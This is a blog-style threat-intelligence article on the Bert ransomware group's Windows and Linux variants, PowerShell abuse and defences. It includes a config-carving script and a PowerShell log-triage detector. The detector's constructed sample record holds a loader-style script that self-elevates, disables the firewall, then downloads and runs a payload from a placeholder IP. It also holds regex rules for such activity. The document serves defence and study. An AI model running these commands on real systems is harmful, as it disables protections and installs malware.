Bert Ransomware Group Unleashed: How a New Cyber Threat Is Evolving and Striking Organizations Worldwide
Cybersecurity is in a constant state of flux, with new threats emerging as quickly as old ones are addressed. But every so often, a group appears that truly disrupts the status quo—one that adapts, innovates, and spreads faster than most defenders can keep up. The recently discovered Bert ransomware group is rapidly proving to be one of those game-changers.
If you work in IT, manage security for your organization, or simply want to stay ahead of cybercriminals, understanding Bert’s methods and their implications is more than a technical curiosity—it’s a necessity. Let’s break down what makes Bert different, why their attacks matter, and what you can do to stay protected as ransomware evolves in real time.
Who Is the Bert Ransomware Group? A New Player on the Global Stage
In April 2025, cybersecurity analysts at Trend Micro began tracking a previously unknown ransomware group. Dubbed “Bert” (tracked by Trend Micro as “Water Pombero”), the group wasted no time making its presence felt.
What Sets Bert Apart?
- Targets: Bert has attacked organizations across the US, Asia, and Europe.
- Sectors hit: Healthcare, technology, and event services have all reported confirmed incidents.
- Dual-platform focus: Unlike many early-stage groups, Bert has released ransomware variants for both Windows and Linux environments.
- Rapid evolution: In just a few months, their code, techniques, and obfuscation methods have improved remarkably, showing a level of sophistication rarely seen in newcomers.
Here’s why that matters: Most ransomware groups take years to refine their approach, but Bert is iterating at lightning speed, leaving defenders scrambling.
Tracing Bert’s Footprints: Infrastructure and Attribution
One of the first clues to Bert’s operations came from its delivery infrastructure. The loader fetches the ransomware payload from a remote IP address in ASN 39134, an autonomous system registered in Russia, and then executes it on the victim host.
Now, does this mean Bert is a Russian outfit? Not necessarily—cybercriminals often route attacks through foreign infrastructure to muddy the waters. But it’s a key detail, hinting at possible connections to threat actors operating in, or affiliated with, the region.
“While this alone does not establish attribution, the use of Russian infrastructure may indicate a potential connection to threat actors operating in or associated with the region.” – Trend Micro researchers
Bert’s Attack Chain: How Does the Ransomware Infect Victims?
If you’re wondering how Bert gets in, you’re not alone. As of now, the exact initial access vector remains unknown. But there are some clues:
- Post-compromise activity is well documented, including PowerShell scripts that elevate privileges and disable the Windows Firewall.
- Ransomware payloads are downloaded from remote infrastructure and executed with elevated privileges.
- Adaptation to environment: Bert ships separate Windows and Linux builds, each tailored to the platform it runs on.
Let me explain why that’s important: even without knowing precisely how Bert breaks in, the ability to elevate privileges, switch off defenses, and deploy ransomware across two platforms shows a high degree of operational maturity.
Bert’s Ransomware Variants: Fast Evolution, Greater Danger
What’s truly alarming about Bert is the speed and sophistication of their code evolution—especially across both Windows and Linux ecosystems. Let’s take a closer look.
Older Windows Variants: Simple but Effective
Initially, Bert’s Windows ransomware used a straightforward approach:
- Drive enumeration: It mapped out every available drive.
- Note-dropping: It placed a ransom note in each directory.
- File path collection: It built a complete list of files to encrypt.
- Multi-threaded encryption: Only after that collection finished did it begin encrypting files in parallel.
This approach worked, but the enumeration and note-dropping phase produced observable file-system activity before a single file was encrypted, which gave defenders a small window to detect and halt the process.
Newer Windows Variants: Faster, Smarter, More Dangerous
Recent analysis uncovered significant improvements:
- ConcurrentQueue data structure: Discovered files are pushed onto a thread-safe queue and picked up by encryption workers immediately, rather than after a full directory scan.
- DiskWorker component: Each disk gets its own worker, so multiple drives are encrypted concurrently.
- Encryption begins instantly: The first file is encrypted as soon as it is found, collapsing the gap between enumeration and impact.
- AES file encryption: Files are encrypted with AES, so recovery without the attacker-held key is not feasible.
Bottom line: Bert’s new variants leave defenders even less time to react. The group is learning from its early builds and optimizing for speed.
Bert’s Linux Ransomware: Targeting Servers with Ruthless Efficiency
Bert isn’t content to target just Windows environments. In May, Trend Micro researchers discovered a Linux variant that’s no less concerning:
- Up to 50 encryption threads: Rapid encryption across large file systems.
- Terminates ESXi virtual machines: It forcibly kills every running VM on an ESXi host, so the virtual disk files are released and can be encrypted while the workloads themselves go down.
- File extension: Encrypted files are renamed with the .encrypted_by_bert extension.
- Ransom note: Dropped as encrypted_by_bert-decrypt.txt.
A particularly modern touch is the JSON-formatted configuration embedded in the binary, which lets the operators adjust a build per campaign by editing a config block rather than recompiling. The approach mirrors that of established groups such as REvil, from whose Linux variant Bert’s may be derived.
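The embedded configuration is the first thing an analyst pulls from a sample, because it reveals the extension, note name, thread count and exclusions without running the binary. The following Python is an added example, not Trend Micro’s tooling and not anything from Bert’s own code: it carves brace-balanced runs of printable text out of a byte blob and keeps only those that parse as a JSON object, which is how you separate a real embedded config from the stray braces that appear in code and data. The sample blob and its keys (ext, note, threads, kill_vms, skip_dirs) are constructed for illustration and are not Bert’s actual schema.

```python
"""Carve an embedded JSON configuration out of a ransomware sample.

Added example, not Trend Micro's tooling or Bert's code. SAMPLE_BLOB is a
constructed stand-in for an ELF binary; its config keys are hypothetical,
chosen to mirror the behaviour described on the page, not the real schema.
"""
import json

OPEN, CLOSE, QUOTE, BACKSLASH = ord("{"), ord("}"), ord('"'), ord("\\")
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}

# Constructed sample: ELF-like header, code-looking braces that are not JSON,
# the embedded config, then a brace pair that is not valid JSON.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"int main() { return 0; }"
    + b"\x90" * 16
    + b'{"ext": ".encrypted_by_bert", "note": "encrypted_by_bert-decrypt.txt", '
    + b'"threads": 50, "kill_vms": true, "skip_dirs": ["/proc", "/sys", "/dev"]}'
    + b"\x00" * 8
    + b"{not json}"
    + b"\xff" * 4
)


def _balanced_spans(blob):
    """Yield (offset, bytes) for each '{' ... matching '}' run of printable text.

    Tracks JSON string state so braces inside string values don't confuse the
    depth count, and abandons a candidate as soon as a non-printable byte shows
    up outside a string (that is code or data, not an embedded text config).
    """
    i, n = 0, len(blob)
    while i < n:
        if blob[i] != OPEN:
            i += 1
            continue
        depth, in_str, escaped, end = 0, False, False, -1
        for j in range(i, n):
            c = blob[j]
            if in_str:
                if escaped:
                    escaped = False
                elif c == BACKSLASH:
                    escaped = True
                elif c == QUOTE:
                    in_str = False
                elif c < 0x20:          # raw control byte inside a string: not JSON
                    break
            elif c == QUOTE:
                in_str = True
            elif c == OPEN:
                depth += 1
            elif c == CLOSE:
                depth -= 1
                if depth == 0:
                    end = j
                    break
            elif c not in PRINTABLE:
                break
        if end == -1:
            i += 1
            continue
        yield i, blob[i:end + 1]
        i = end + 1


def extract_json_configs(blob, min_keys=2):
    """Return [(offset, dict)] for every balanced span that parses as a JSON object.

    min_keys drops accidental tiny matches such as '{}' or '{"a": 1}' in code.
    """
    found = []
    for offset, span in _balanced_spans(blob):
        try:
            obj = json.loads(span.decode("utf-8"))
        except (UnicodeDecodeError, ValueError):
            continue
        if isinstance(obj, dict) and len(obj) >= min_keys:
            found.append((offset, obj))
    return found


if __name__ == "__main__":
    for offset, cfg in extract_json_configs(SAMPLE_BLOB):
        print(f"config at offset {offset:#x}:")
        print(json.dumps(cfg, indent=2))
```

Run it against a real sample by replacing SAMPLE_BLOB with the file’s bytes; the offsets it returns are also what you feed into a YARA rule or a static-analysis bookmark when you need to track how the config block moves between builds.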
PowerShell Abuse: The Swiss Army Knife of Bert’s Operations
One of Bert’s defining features is their clever abuse of legitimate administration tools, especially Microsoft PowerShell.
How Does Bert Use PowerShell?
- Privilege escalation: The loader relaunches itself with Start-Process and the -Verb RunAs parameter to obtain an administrator token. On a default configuration this raises a UAC prompt, so it presupposes a user who can approve elevation, or a UAC setting that does not prompt, rather than any exploit.
- Defense evasion: Set-NetFirewallProfile is used to disable the Windows Firewall profiles, so the ransomware can operate and reach out undisturbed.
- Loading the ransomware: A loader script, start.ps1, downloads the payload and executes it.
Why is this so effective? PowerShell is a trusted, built-in Windows tool. Its use often flies under the radar, especially in organizations without strict script monitoring in place.
Real-World Example: From Compromise to Control
Imagine an attacker already has a foothold on your network, perhaps via a phishing email or an exploited vulnerability. With a single PowerShell script they:
- Elevate their privileges
- Turn off your firewall profiles
- Download and execute ransomware from a remote server
All of it through a signed, built-in Microsoft binary, and all before most security tools raise the alarm.
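That chain is visible in PowerShell telemetry alone, provided Script Block Logging is enabled (it writes the full script text to Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log). The following Python is an added example, not part of the original write-up: it classifies 4104 records using the indicators this section describes (Start-Process with -Verb RunAs, Set-NetFirewallProfile -Enabled False, and a download followed by execution). The records, hostnames and the 198.51.100.7 address are constructed; the loader-like record is modelled on the behaviour described here, not copied from Bert’s start.ps1, and the Set-MpPreference rule is an added assumption about companion Defender tampering that this page does not document.

```python
"""Triage PowerShell script-block log records for loader-style behaviour.

Added example. Assumes Script Block Logging is on, so each record carries the
full script text (Event ID 4104, Microsoft-Windows-PowerShell/Operational).
All records below are constructed; none is real telemetry or Bert's script.
"""
import re

# re.I because PowerShell cmdlets and parameters are case-insensitive;
# re.S lets '.*?' span line breaks inside a single script block.
RULES = {
    "self_elevation":    re.compile(r"Start-Process\b.*?-Verb\s+RunAs", re.I | re.S),
    "firewall_disabled": re.compile(r"Set-NetFirewallProfile\b.*?-Enabled\s+\$?False", re.I | re.S),
    # Defender tampering is not described on the page; included as an assumed
    # companion indicator so the rule set is not specific to one loader.
    "defender_tamper":   re.compile(r"Set-MpPreference\b.*?-Disable\w+\s+\$?True", re.I | re.S),
    "remote_download":   re.compile(r"Invoke-WebRequest|Start-BitsTransfer|Net\.WebClient|Download(File|String)", re.I),
    "execute_payload":   re.compile(r"Start-Process\b|Invoke-Expression|\biex\b|Invoke-Item", re.I),
}

IMPAIRMENT = {"firewall_disabled", "defender_tamper"}


def classify(script_text):
    """Return (severity, hits) for one script block.

    'high'   : a defence was disabled, or the script self-elevated and fetched a remote file.
    'review' : download followed by execution; legitimate deployment tooling does
               this too, so it needs an allowlist rather than an automatic block.
    'none'   : no indicator fired.
    """
    hits = {name for name, rx in RULES.items() if rx.search(script_text)}
    if hits & IMPAIRMENT or {"self_elevation", "remote_download"} <= hits:
        return "high", hits
    if {"remote_download", "execute_payload"} <= hits:
        return "review", hits
    return "none", hits


def triage(records):
    """Return [(computer, severity, sorted hits)] for every 4104 record that fired."""
    out = []
    for rec in records:
        if rec.get("EventID") != 4104:      # only script-block records carry the text
            continue
        severity, hits = classify(rec["ScriptBlockText"])
        if severity != "none":
            out.append((rec["Computer"], severity, sorted(hits)))
    return out


# Constructed sample records (hostnames and 198.51.100.7 are documentation values).
SAMPLE_RECORDS = [
    {"EventID": 4104, "Computer": "ws01", "ScriptBlockText":
        "Get-Process | Where-Object CPU -gt 100 | Sort-Object CPU -Descending"},
    {"EventID": 4104, "Computer": "ws02", "ScriptBlockText":
        "Set-NetFirewallProfile -Profile Domain -Enabled True"},
    {"EventID": 4104, "Computer": "srv03", "ScriptBlockText": (
        "if (-not ([Security.Principal.WindowsPrincipal]"
        "[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole("
        "[Security.Principal.WindowsBuiltInRole]::Administrator)) {\n"
        "  Start-Process powershell -ArgumentList '-File start.ps1' -Verb RunAs; exit\n}\n"
        "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False\n"
        "Invoke-WebRequest -Uri http://198.51.100.7/payload.exe -OutFile $env:TEMP\\payload.exe\n"
        "Start-Process $env:TEMP\\payload.exe")},
    {"EventID": 4104, "Computer": "deploy01", "ScriptBlockText": (
        "Invoke-WebRequest -Uri https://updates.example.net/agent.msi -OutFile agent.msi\n"
        "Start-Process msiexec -ArgumentList '/i agent.msi /qn' -Wait")},
    {"EventID": 4103, "Computer": "ws01", "ScriptBlockText": "Set-NetFirewallProfile -Enabled False"},
]

if __name__ == "__main__":
    for computer, severity, hits in triage(SAMPLE_RECORDS):
        print(f"{computer:10} {severity:7} {', '.join(hits)}")
```

The deployment host lands in “review” on purpose: download-then-execute is what software distribution looks like as well, so that tier is for allowlisting known sources. What separates a loader from a deployment script is disabling a defence or self-elevating before fetching the payload, and that is the only thing “high” keys on.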
What Makes Bert Dangerous? Key Takeaways for Security Leaders
So, what separates Bert from other ransomware groups—and why should you care?
1. Speed and Agility
- Bert’s code is iterating rapidly, with new versions appearing within weeks, not months.
- Encryption processes are streamlined, minimizing detection and response time.
2. Cross-Platform Targeting
- Both Windows and Linux environments are in the crosshairs.
- Linux variant specifically attacks ESXi hosts, expanding the range of potential victims.
3. Living Off the Land
- Bert leverages legitimate tools (like PowerShell) for malicious purposes, making detection trickier.
4. Infrastructure Hints at Regional Ties
- Staging the payload on Russian-registered infrastructure does not prove origin, but taken together with the apparent code overlap with REvil’s Linux variant it suggests ties to established actors.
5. Sector Diversity
- Victims span healthcare, technology, and events—indicating opportunism and broad reach.
Here’s why that’s a wakeup call: even if your organization isn’t a typical “high-value” ransomware target, Bert’s scattershot victim selection means any organization can end up in scope.
Lessons from Bert: How Ransomware Is Changing in 2025
The emergence of Bert is part of a larger trend in ransomware:
- Repurposing existing tools and code: New attackers don’t need to reinvent the wheel—just tweak, iterate, and deploy.
- Continuous refinement: Attackers monitor what works and rapidly adjust tactics, techniques, and procedures (TTPs).
- Focus on fast monetization: Every improvement Bert has made is aimed at minimizing their window of exposure and maximizing their leverage over victims.
If you’re feeling overwhelmed, you’re not alone. The playbook is being rewritten in real time.
Defense Strategies: Protecting Your Organization from Bert and Its Peers
Now for the part you’re probably most interested in: How can you defend against Bert and other rapidly evolving ransomware groups?
1. Monitor PowerShell and Script Execution
- Audit and restrict PowerShell use: Use whitelisting and monitoring tools to detect unusual script activity, especially scripts that escalate privileges or disable defenses.
- Alert on suspicious commands: Look for Start-Process with -Verb RunAs, Set-NetFirewallProfile with -Enabled False, and scripts that download a file and then execute it.
2. Harden Endpoint Defenses
- Keep systems up to date: Patch vulnerabilities that could be used for initial access.
- Employ endpoint detection and response (EDR) tools capable of catching both known and unknown threats.
3. Regular Backups and Recovery Drills
- Test your backups: Frequently test restoration from backups to ensure you can recover quickly if ransomware hits.
- Store backups offline: Protect them from being encrypted alongside production data.
4. Network Segmentation and Least Privilege
- Limit lateral movement: Segment your network to prevent attackers from easily spreading ransomware.
- Restrict admin privileges: Only give elevated permissions to those who genuinely need them.
5. Employee Awareness and Training
- Phishing defenses: Since the initial access method for Bert is unknown, train staff to recognize social engineering attempts.
- Report suspicious activity: Foster a culture where employees feel comfortable flagging odd behavior.
6. Collaborate and Stay Informed
- Share intelligence: Participate in industry ISACs and threat intelligence sharing organizations.
- Follow trusted sources: Keep up with updates from cybersecurity leaders like Trend Micro, CISA, and Europol.
The Human Side: Why Bert’s Rise Should Concern Every Organization
It’s easy to think of ransomware as a distant threat—something that happens to other people, somewhere else. But Bert’s attacks against healthcare providers, tech firms, and event service companies prove otherwise.
Here’s why that matters: Ransomware isn’t just about lost files or IT headaches. It’s about patients unable to access care, businesses forced offline, and reputations harmed overnight.
If you’re in charge of keeping your organization safe, Bert’s emergence is a stark reminder that:
- No sector is immune
- No system is too obscure
- No business is too small or big to be targeted
FAQs: People Also Ask About Bert Ransomware
What is the Bert ransomware group?
The Bert ransomware group is a newly discovered cybercriminal operation active since April 2025. They target organizations worldwide, leveraging rapidly evolving ransomware variants for both Windows and Linux systems. Their attacks have hit sectors like healthcare, technology, and events.
How does Bert ransomware infect victims?
The precise initial access method is still undetermined, but Bert is known to use PowerShell scripts to escalate privileges, disable defenses, and deliver ransomware payloads. Their tactics are adaptive, making use of both legitimate and malicious tools.
What makes Bert ransomware particularly dangerous?
Bert stands out due to its fast code evolution, multi-platform targeting, abuse of trusted administration tools, and rapid encryption methods that leave little time for defenders to respond.
Is there a connection between Bert and Russian cybercriminals?
Bert’s payload is downloaded from an IP address in ASN 39134, a network registered in Russia, but that alone doesn’t prove Russian involvement: attackers routinely stage infrastructure abroad to obscure their origins.
Can Linux systems be affected by Bert ransomware?
Yes. Bert has a Linux variant that targets servers, including ESXi hosts, where it forcibly terminates running virtual machines and then encrypts with up to 50 threads for maximum impact.
How can organizations protect themselves from Bert and similar threats?
Key steps include monitoring PowerShell and script execution, hardening endpoints, maintaining secure and tested backups, enforcing network segmentation, restricting privileges, and ongoing employee training.
Where can I find more information on Bert ransomware?
Authoritative sources include Trend Micro’s security reports, CISA ransomware guidance, and ongoing updates from cybersecurity news outlets like The Hacker News.
Final Thoughts: Staying One Step Ahead in the Ransomware Arms Race
The Bert ransomware group is a wakeup call for every organization, regardless of size or sector. Their rapid evolution, cross-platform focus, and adept use of everyday tools like PowerShell underscore a new era for cyber threats—one where simplicity, speed, and adaptability trump complexity.
The best defense? Stay informed, stay vigilant, and invest in layered security practices that make it as hard as possible for attackers to succeed.